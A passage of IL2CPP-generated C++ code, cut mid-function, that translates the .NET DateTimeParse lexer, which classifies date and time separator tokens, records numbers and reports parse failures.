IL_01f1; } } { int32_t L_49 = V_5; if ((((int32_t)L_49) == ((int32_t)((int32_t)1536)))) { goto IL_023a; } } { int32_t L_50 = V_5; if ((((int32_t)L_50) == ((int32_t)((int32_t)1792)))) { goto IL_0247; } } { goto IL_02cb; } IL_016f: { int32_t L_51 = V_5; if ((((int32_t)L_51) > ((int32_t)((int32_t)2560)))) { goto IL_01a1; } } { int32_t L_52 = V_5; if ((((int32_t)L_52) == ((int32_t)((int32_t)2048)))) { goto IL_02a7; } } { int32_t L_53 = V_5; if ((((int32_t)L_53) == ((int32_t)((int32_t)2304)))) { goto IL_02a7; } } { int32_t L_54 = V_5; if ((((int32_t)L_54) == ((int32_t)((int32_t)2560)))) { goto IL_02a7; } } { goto IL_02cb; } IL_01a1: { int32_t L_55 = V_5; if ((((int32_t)L_55) > ((int32_t)((int32_t)3072)))) { goto IL_01c7; } } { int32_t L_56 = V_5; if ((((int32_t)L_56) == ((int32_t)((int32_t)2816)))) { goto IL_02b9; } } { int32_t L_57 = V_5; if ((((int32_t)L_57) == ((int32_t)((int32_t)3072)))) { goto IL_02b9; } } { goto IL_02cb; } IL_01c7: { int32_t L_58 = V_5; if ((((int32_t)L_58) == ((int32_t)((int32_t)3328)))) { goto IL_02b9; } } { int32_t L_59 = V_5; if ((((int32_t)L_59) == ((int32_t)((int32_t)3840)))) { goto IL_0269; } } { goto IL_02cb; } IL_01e4: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_60 = ___dtok2; L_60->set_dtt_0(((int32_t)14)); goto IL_02db; } IL_01f1: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_61 = ___raw3; int32_t L_62 = L_61->get_timeMark_6(); if ((!(((uint32_t)L_62) == ((uint32_t)(-1))))) { goto IL_021a; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_63 = ___raw3; int32_t L_64 = V_4; G_B41_0 = L_63; if ((((int32_t)L_64) == ((int32_t)((int32_t)1024)))) { G_B42_0 = L_63; goto IL_0207; } } { G_B43_0 = 1; G_B43_1 = G_B41_0; goto IL_0208; } IL_0207: { G_B43_0 = 0; G_B43_1 = G_B42_0; } IL_0208: { G_B43_1->set_timeMark_6(G_B43_0); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_65 = ___dtok2; L_65->set_dtt_0(((int32_t)12)); goto IL_02db; } IL_021a: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_66 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_66, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); goto IL_02db; } IL_022d: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_67 = ___dtok2; L_67->set_dtt_0(((int32_t)12)); goto IL_02db; } IL_023a: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_68 = ___dtok2; L_68->set_dtt_0(((int32_t)13)); goto IL_02db; } IL_0247: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_69 = ___raw3; bool L_70 = L_69->get_hasSameDateAndTimeSeparators_8(); if (L_70) { goto IL_025f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_71 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_71, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_025f: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_72 = ___dtok2; L_72->set_dtt_0(((int32_t)13)); goto IL_02db; } IL_0269: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_73 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_74 = ___dps0; int32_t L_75 = L_74; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_76 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_73)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_75)); int32_t L_77 = ((int32_t)13); int32_t L_78 = (int32_t)(L_76)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_77)); if ((!(((uint32_t)L_78) == ((uint32_t)((int32_t)20))))) { goto IL_029d; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_79 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_80 = ___dps0; int32_t L_81 = L_80; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_82 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_79)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_81)); int32_t L_83 = ((int32_t)12); int32_t L_84 = (int32_t)(L_82)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_83)); if ((((int32_t)L_84) <= ((int32_t)((int32_t)20)))) { goto IL_029d; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_85 = ___str1; int32_t L_86 = V_2; L_85->set_Index_1(L_86); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_87 = ___str1; Il2CppChar L_88 = V_3; L_87->set_m_current_3(L_88); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_89 = ___dtok2; L_89->set_dtt_0(((int32_t)12)); goto IL_02db; } IL_029d: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_90 = ___dtok2; L_90->set_dtt_0(((int32_t)13)); goto IL_02db; } IL_02a7: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_91 = ___dtok2; L_91->set_dtt_0(((int32_t)9)); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_92 = ___dtok2; int32_t L_93 = V_4; L_92->set_suffix_1(L_93); goto IL_02db; } IL_02b9: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_94 = ___dtok2; L_94->set_dtt_0(((int32_t)10)); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_95 = ___dtok2; int32_t L_96 = V_4; L_95->set_suffix_1(L_96); goto IL_02db; } IL_02cb: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_97 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_97, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_02db: { return (bool)1; } IL_02dd: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_98 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_98, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_02ed: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_99 = ___str1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_100 = ___dtfi5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_101 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_100); int32_t L_102 = __DTString_GetSeparatorToken_m2F4CE10AC9C39A5380D3DD5344B81F79C7006EF1((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_99, L_101, (int32_t*)(&V_2), (Il2CppChar*)(&V_3), /*hidden argument*/NULL); int32_t L_103 = L_102; V_4 = L_103; V_5 = L_103; int32_t L_104 = V_5; if ((((int32_t)L_104) > ((int32_t)((int32_t)2048)))) { goto IL_037d; } } { int32_t L_105 = V_5; if ((((int32_t)L_105) > ((int32_t)((int32_t)1024)))) { goto IL_033a; } } { int32_t L_106 = V_5; if ((((int32_t)L_106) == ((int32_t)((int32_t)512)))) { goto IL_03f2; } } { int32_t L_107 = V_5; if ((((int32_t)L_107) == ((int32_t)((int32_t)768)))) { goto IL_0481; } } { int32_t L_108 = V_5; if ((((int32_t)L_108) == ((int32_t)((int32_t)1024)))) { goto IL_040a; } } { goto IL_05d3; } IL_033a: { int32_t L_109 = V_5; if ((((int32_t)L_109) > ((int32_t)((int32_t)1536)))) { goto IL_0360; } } { int32_t L_110 = V_5; if ((((int32_t)L_110) == ((int32_t)((int32_t)1280)))) { goto IL_040a; } } { int32_t L_111 = V_5; if ((((int32_t)L_111) == ((int32_t)((int32_t)1536)))) { goto IL_0499; } } { goto IL_05d3; } IL_0360: { int32_t L_112 = V_5; if ((((int32_t)L_112) == ((int32_t)((int32_t)1792)))) { goto IL_04fa; } } { int32_t L_113 = V_5; if ((((int32_t)L_113) == ((int32_t)((int32_t)2048)))) { goto IL_054b; } } { goto IL_05d3; } IL_037d: { int32_t L_114 = V_5; if ((((int32_t)L_114) > ((int32_t)((int32_t)2816)))) { goto IL_03af; } } { int32_t L_115 = V_5; if ((((int32_t)L_115) == ((int32_t)((int32_t)2304)))) { goto IL_0590; } } { int32_t L_116 = V_5; if ((((int32_t)L_116) == ((int32_t)((int32_t)2560)))) { goto IL_0590; } } { int32_t L_117 = V_5; if ((((int32_t)L_117) == ((int32_t)((int32_t)2816)))) { goto IL_05a5; } } { goto IL_05d3; } IL_03af: { int32_t L_118 = V_5; if ((((int32_t)L_118) > ((int32_t)((int32_t)3328)))) { goto IL_03d5; } } { int32_t L_119 = V_5; if ((((int32_t)L_119) == ((int32_t)((int32_t)3072)))) { goto IL_05a5; } } { int32_t L_120 = V_5; if ((((int32_t)L_120) == ((int32_t)((int32_t)3328)))) { goto IL_05a5; } } { goto IL_05d3; } IL_03d5: { int32_t L_121 = V_5; if ((((int32_t)L_121) == ((int32_t)((int32_t)3584)))) { goto IL_05ba; } } { int32_t L_122 = V_5; if ((((int32_t)L_122) == ((int32_t)((int32_t)3840)))) { goto IL_04b1; } } { goto IL_05d3; } IL_03f2: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_123 = ___dtok2; L_123->set_dtt_0(1); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_124 = ___raw3; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_125 = ___dtok2; int32_t L_126 = L_125->get_num_2(); DateTimeRawInfo_AddNumber_m2E5EFAF94BCBCEA2B72C78B5D109377BB97D69F4((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_124, L_126, /*hidden argument*/NULL); goto IL_0a4d; } IL_040a: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_127 = ___raw3; int32_t L_128 = L_127->get_timeMark_6(); if ((!(((uint32_t)L_128) == ((uint32_t)(-1))))) { goto IL_0452; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_129 = ___raw3; int32_t L_130 = V_4; G_B87_0 = L_129; if ((((int32_t)L_130) == ((int32_t)((int32_t)1024)))) { G_B88_0 = L_129; goto IL_0420; } } { G_B89_0 = 1; G_B89_1 = G_B87_0; goto IL_0421; } IL_0420: { G_B89_0 = 0; G_B89_1 = G_B88_0; } IL_0421: { G_B89_1->set_timeMark_6(G_B89_0); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_131 = ___dtok2; L_131->set_dtt_0(2); int32_t L_132 = ___dps0; if ((!(((uint32_t)L_132) == ((uint32_t)4)))) { goto IL_0444; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_133 = ___result4; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_134 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_135 = ___dtfi5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_136 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_135); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_137 = DateTimeParse_ProcessTerminaltState_mDEE6B5911737D96C89B9AA5749F4A8CB86EA838D(((int32_t)21), (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_133, (int32_t*)(&___styles6), (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_134, L_136, /*hidden argument*/NULL); if (L_137) { goto IL_0444; } } { return (bool)0; } IL_0444: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_138 = ___raw3; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_139 = ___dtok2; int32_t L_140 = L_139->get_num_2(); DateTimeRawInfo_AddNumber_m2E5EFAF94BCBCEA2B72C78B5D109377BB97D69F4((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_138, L_140, /*hidden argument*/NULL); goto IL_0465; } IL_0452: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_141 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_141, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); goto IL_0a4d; } IL_0465: { int32_t L_142 = ___dps0; if ((((int32_t)L_142) == ((int32_t)((int32_t)19)))) { goto IL_0472; } } { int32_t L_143 = ___dps0; if ((!(((uint32_t)L_143) == ((uint32_t)((int32_t)18))))) { goto IL_0a4d; } } IL_0472: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_144 = ___str1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_145 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_146 = DateTimeParse_HandleTimeZone_mA7F93EC5CC7B120970BA0CF78CA0CB5803BEB4CD((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_144, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_145, /*hidden argument*/NULL); if (L_146) { goto IL_0a4d; } } { return (bool)0; } IL_0481: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_147 = ___dtok2; L_147->set_dtt_0(3); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_148 = ___raw3; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_149 = ___dtok2; int32_t L_150 = L_149->get_num_2(); DateTimeRawInfo_AddNumber_m2E5EFAF94BCBCEA2B72C78B5D109377BB97D69F4((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_148, L_150, /*hidden argument*/NULL); goto IL_0a4d; } IL_0499: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_151 = ___dtok2; L_151->set_dtt_0(4); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_152 = ___raw3; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_153 = ___dtok2; int32_t L_154 = L_153->get_num_2(); DateTimeRawInfo_AddNumber_m2E5EFAF94BCBCEA2B72C78B5D109377BB97D69F4((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_152, L_154, /*hidden argument*/NULL); goto IL_0a4d; } IL_04b1: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_155 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_156 = ___dps0; int32_t L_157 = L_156; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_158 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_155)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_157)); int32_t L_159 = 4; int32_t L_160 = (int32_t)(L_158)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_159)); if ((!(((uint32_t)L_160) == ((uint32_t)((int32_t)20))))) { goto IL_04e2; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_161 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_162 = ___dps0; int32_t L_163 = L_162; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_164 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_161)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_163)); int32_t L_165 = 3; int32_t L_166 = (int32_t)(L_164)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_165)); if ((((int32_t)L_166) <= ((int32_t)((int32_t)20)))) { goto IL_04e2; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_167 = ___str1; int32_t L_168 = V_2; L_167->set_Index_1(L_168); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_169 = ___str1; Il2CppChar L_170 = V_3; L_169->set_m_current_3(L_170); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_171 = ___dtok2; L_171->set_dtt_0(3); goto IL_04e9; } IL_04e2: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_172 = ___dtok2; L_172->set_dtt_0(4); } IL_04e9: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_173 = ___raw3; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_174 = ___dtok2; int32_t L_175 = L_174->get_num_2(); DateTimeRawInfo_AddNumber_m2E5EFAF94BCBCEA2B72C78B5D109377BB97D69F4((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_173, L_175, /*hidden argument*/NULL); goto IL_0a4d; } IL_04fa: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_176 = ___raw3; bool L_177 = L_176->get_hasSameDateAndTimeSeparators_8(); if (!L_177) { goto IL_0533; } } { int32_t L_178 = ___dps0; if ((((int32_t)L_178) == ((int32_t)((int32_t)11)))) { goto IL_051b; } } { int32_t L_179 = ___dps0; if ((((int32_t)L_179) == ((int32_t)((int32_t)12)))) { goto IL_051b; } } { int32_t L_180 = ___dps0; if ((((int32_t)L_180) == ((int32_t)((int32_t)13)))) { goto IL_051b; } } { int32_t L_181 = ___dps0; if ((((int32_t)L_181) == ((int32_t)((int32_t)14)))) { goto IL_051b; } } { int32_t L_182 = ___dps0; if ((!(((uint32_t)L_182) == ((uint32_t)((int32_t)15))))) { goto IL_0533; } } IL_051b: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_183 = ___dtok2; L_183->set_dtt_0(4); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_184 = ___raw3; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_185 = ___dtok2; int32_t L_186 = L_185->get_num_2(); DateTimeRawInfo_AddNumber_m2E5EFAF94BCBCEA2B72C78B5D109377BB97D69F4((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_184, L_186, /*hidden argument*/NULL); goto IL_0a4d; } IL_0533: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_187 = ___dtok2; L_187->set_dtt_0(5); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_188 = ___raw3; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_189 = ___dtok2; int32_t L_190 = L_189->get_num_2(); DateTimeRawInfo_AddNumber_m2E5EFAF94BCBCEA2B72C78B5D109377BB97D69F4((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_188, L_190, /*hidden argument*/NULL); goto IL_0a4d; } IL_054b: { } IL_054c: try { // begin try (depth: 1) DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_191 = ___dtok2; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_192 = ___dtfi5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_193 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_192); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_194 = DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862(L_193, /*hidden argument*/NULL); int32_t L_195 = V_1; int32_t L_196 = VirtFuncInvoker1< int32_t, int32_t >::Invoke(27 /* System.Int32 System.Globalization.Calendar::ToFourDigitYear(System.Int32) */, L_194, L_195); L_191->set_num_2(L_196); goto IL_057b; } // end try (depth: 1) catch(Il2CppExceptionWrapper& e) { __exception_local = (Exception_t *)e.ex; if(il2cpp_codegen_class_is_assignable_from (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var, il2cpp_codegen_object_class(e.ex))) goto CATCH_0562; throw e; } CATCH_0562: { // begin catch(System.ArgumentOutOfRangeException) V_6 = ((ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)__exception_local); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_197 = ___result4; ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_198 = V_6; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_197, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, L_198, /*hidden argument*/NULL); V_7 = (bool)0; goto IL_0a4f; } // end catch (depth: 1) IL_057b: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_199 = ___dtok2; L_199->set_dtt_0(((int32_t)9)); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_200 = ___dtok2; int32_t L_201 = V_4; L_200->set_suffix_1(L_201); goto IL_0a4d; } IL_0590: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_202 = ___dtok2; L_202->set_dtt_0(((int32_t)9)); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_203 = ___dtok2; int32_t L_204 = V_4; L_203->set_suffix_1(L_204); goto IL_0a4d; } IL_05a5: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_205 = ___dtok2; L_205->set_dtt_0(((int32_t)10)); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_206 = ___dtok2; int32_t L_207 = V_4; L_206->set_suffix_1(L_207); goto IL_0a4d; } IL_05ba: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_208 = ___dtok2; L_208->set_dtt_0(((int32_t)19)); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_209 = ___raw3; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_210 = ___dtok2; int32_t L_211 = L_210->get_num_2(); DateTimeRawInfo_AddNumber_m2E5EFAF94BCBCEA2B72C78B5D109377BB97D69F4((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_209, L_211, /*hidden argument*/NULL); goto IL_0a4d; } IL_05d3: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_212 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_212, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_05e3: { int32_t L_213 = V_1; if ((((int32_t)L_213) < ((int32_t)((int32_t)100)))) { goto IL_0690; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_214 = ___raw3; int32_t L_215 = L_214->get_year_3(); if ((!(((uint32_t)L_215) == ((uint32_t)(-1))))) { goto IL_0680; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_216 = ___raw3; int32_t L_217 = V_1; L_216->set_year_3(L_217); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_218 = ___str1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_219 = ___dtfi5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_220 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_219); int32_t L_221 = __DTString_GetSeparatorToken_m2F4CE10AC9C39A5380D3DD5344B81F79C7006EF1((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_218, L_220, (int32_t*)(&V_2), (Il2CppChar*)(&V_3), /*hidden argument*/NULL); int32_t L_222 = L_221; V_4 = L_222; V_5 = L_222; int32_t L_223 = V_5; if ((((int32_t)L_223) == ((int32_t)((int32_t)512)))) { goto IL_062d; } } { int32_t L_224 = V_5; if ((((int32_t)L_224) == ((int32_t)((int32_t)768)))) { goto IL_063a; } } { int32_t L_225 = V_5; if ((((int32_t)L_225) == ((int32_t)((int32_t)3840)))) { goto IL_0647; } } { goto IL_0670; } IL_062d: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_226 = ___dtok2; L_226->set_dtt_0(((int32_t)14)); goto IL_0a4d; } IL_063a: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_227 = ___dtok2; L_227->set_dtt_0(((int32_t)12)); goto IL_0a4d; } IL_0647: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_228 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_229 = ___dps0; int32_t L_230 = L_229; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_231 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_228)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_230)); int32_t L_232 = ((int32_t)12); int32_t L_233 = (int32_t)(L_231)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_232)); if ((((int32_t)L_233) <= ((int32_t)((int32_t)20)))) { goto IL_0670; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_234 = ___str1; int32_t L_235 = V_2; L_234->set_Index_1(L_235); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_236 = ___str1; Il2CppChar L_237 = V_3; L_236->set_m_current_3(L_237); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_238 = ___dtok2; L_238->set_dtt_0(((int32_t)12)); goto IL_0a4d; } IL_0670: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_239 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_239, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return 